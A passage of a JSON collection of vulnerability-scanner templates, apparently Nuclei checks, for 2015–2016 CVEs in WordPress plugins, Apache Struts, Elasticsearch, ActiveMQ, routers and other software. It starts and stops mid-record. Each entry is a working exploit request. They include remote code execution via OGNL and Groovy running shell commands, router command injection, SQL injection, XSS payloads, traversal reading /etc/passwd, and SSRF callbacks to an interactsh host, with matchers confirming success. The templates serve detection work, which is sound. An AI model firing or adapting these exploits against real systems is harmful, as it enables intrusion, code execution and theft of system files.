/wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200","contains(body_2, \"[zm_gallery id=\")","contains(body_2, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")","!contains(body_3, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")"],"condition":"and"}]}]},{"id":"CVE-2016-1000155","info":{"name":"WordPress WPSOLR <=8.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3081","info":{"name":"Apache S2-032 Struts - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3088","info":{"name":"Apache ActiveMQ Fileserver - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["PUT /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{rand1}}\n","GET /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1==204","status_code_2==200","contains((body_2), '{{rand1}}')"],"condition":"and"}]}]},{"id":"CVE-2016-10993","info":{"name":"ScoreMe Theme - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-0957","info":{"name":"Adobe AEM Dispatcher <4.15 - Rules Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/console?.css"],"headers":{"Authorization":"Basic YWRtaW46YWRtaW4K"},"matchers-condition":"and","matchers":[{"type":"word","words":["Adobe","java.lang","(Runtime)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10973","info":{"name":"Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"tab = alert(document.domain);\")","contains(body_2, \"Brafton Article Loader\")"],"condition":"and"}]}]},{"id":"CVE-2016-6277","info":{"name":"NETGEAR Routers - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000131","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000146","info":{"name":"WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000130","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000135","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000153","info":{"name":"WordPress Tidio Gallery <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000136","info":{"name":"WordPress heat-trackr 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1880","info":{"name":"Fortinet FortiOS <=5.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2068","info":{"name":"Magento Server Mass Importer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7780","info":{"name":"ManageEngine Firewall Analyzer <8.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5469","info":{"name":"WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000010","info":{"name":"WordPress Simple Image Manipulator < 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2080","info":{"name":"Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"headers":{"Referer":"\\x00"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Illegal character 0x0 in state"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-4632","info":{"name":"Koha 3.20.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3035","info":{"name":"TP-LINK - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6477","info":{"name":"Nordex NC2  - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert('{{randstr}}')</script>"]}]}]},{"id":"CVE-2015-9312","info":{"name":"NewStatPress <=1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src=x onerror=alert(document.domain)\")","contains(body_2, \"newstatpress\")"],"condition":"and"}]}]},{"id":"CVE-2015-0554","info":{"name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlsecurity.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wpapskkey","var WscDevPin","var sessionkey"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4050","info":{"name":"Symfony - Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000012","info":{"name":"WordPress MyPixs <=0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1503","info":{"name":"IceWarp Mail Server <11.1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd","{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000005","info":{"name":"WordPress Candidate Application Form <= 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1427","info":{"name":"ElasticSearch - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /website/blog/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n  \"name\": \"test\"\n}\n","POST /_search HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\n{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getText()\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5471","info":{"name":"Swim Team <= v1.44.10777 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7823","info":{"name":"Kentico CMS 8.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-9480","info":{"name":"WordPress RobotCPA 5 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4062","info":{"name":"WordPress NewStatPress 0.9.8 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body_2, \"newstatpress_page_nsp_search\")"],"condition":"and"}]}]},{"id":"CVE-2015-2196","info":{"name":"WordPress Spider Calendar <=1.4.9 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"{\\\"status\\\":true,\\\"data\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2015-4666","info":{"name":"Xceedium Xsuite <=2.4.4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8399","info":{"name":"Atlassian Confluence <5.8.17 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["confluence-init.properties","View Default Decorator"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5531","info":{"name":"ElasticSearch <1.6.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["PUT /_snapshot/test HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test\"\n    }\n}\n","PUT /_snapshot/test2 HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test/snapshot-backdata\"\n    }\n}\n","GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ElasticsearchParseException","Failed to derive xcontent from","114, 111, 111, 116, 58"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-3897","info":{"name":"Bonita BPM Portal <6.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd","{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2015-4074","info":{"name":"Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3648","info":{"name":"ResourceSpace - Local File inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3224","info":{"name":"Ruby on Rails Web Console - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{randstr}}"],"headers":{"X-Forwarded-For":"::1"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Rails.root:","Action Controller: Exception caught"],"condition":"and"},{"type":"word","part":"response","words":["X-Web-Console-Session-Id","data-remote-path=","data-session-id="],"case-insensitive":true,"condition":"or"}]}]},{"id":"CVE-2015-8813","info":{"name":"Umbraco <7.4.0- Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2015-2755","info":{"name":"WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin.php?page=ab_map_options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>+-+-1-+-+alert(document.domain)</script>\")","contains(body_2, \"ab-google-map-travel\")"],"condition":"and"}]}]},{"id":"CVE-2015-4694","info":{"name":"WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6544","info":{"name":"Combodo iTop <2.2.0-2459 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2807","info":{"name":"Navis DocumentCloud <0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4063","info":{"name":"NewStatPress <0.9.9 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"],"condition":"and"}]}]},{"id":"CVE-2015-8349","info":{"name":"SourceBans <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2166","info":{"name":"Ericsson Drutt MSDP - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9323","info":{"name":"404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"404-to-301\")"],"condition":"and"}]}]},{"id":"CVE-2015-7245","info":{"name":"D-Link DVG-N5402SP - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /cgibin/webproc HTTP/1.1\nHost: {{Hostname}}\n\ngetpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2015-3337","info":{"name":"Elasticsearch - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7297","info":{"name":"Joomla! Core SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2015-4414","info":{"name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5461","info":{"name":"WordPress StageShow <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-2996","info":{"name":"SysAid Help Desk <15.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd","{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2067","info":{"name":"Magento Server MAGMI - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7450","info":{"name":"IBM WebSphere Java Object Deserialization - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: \"urn:AdminService\"\n\n<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header 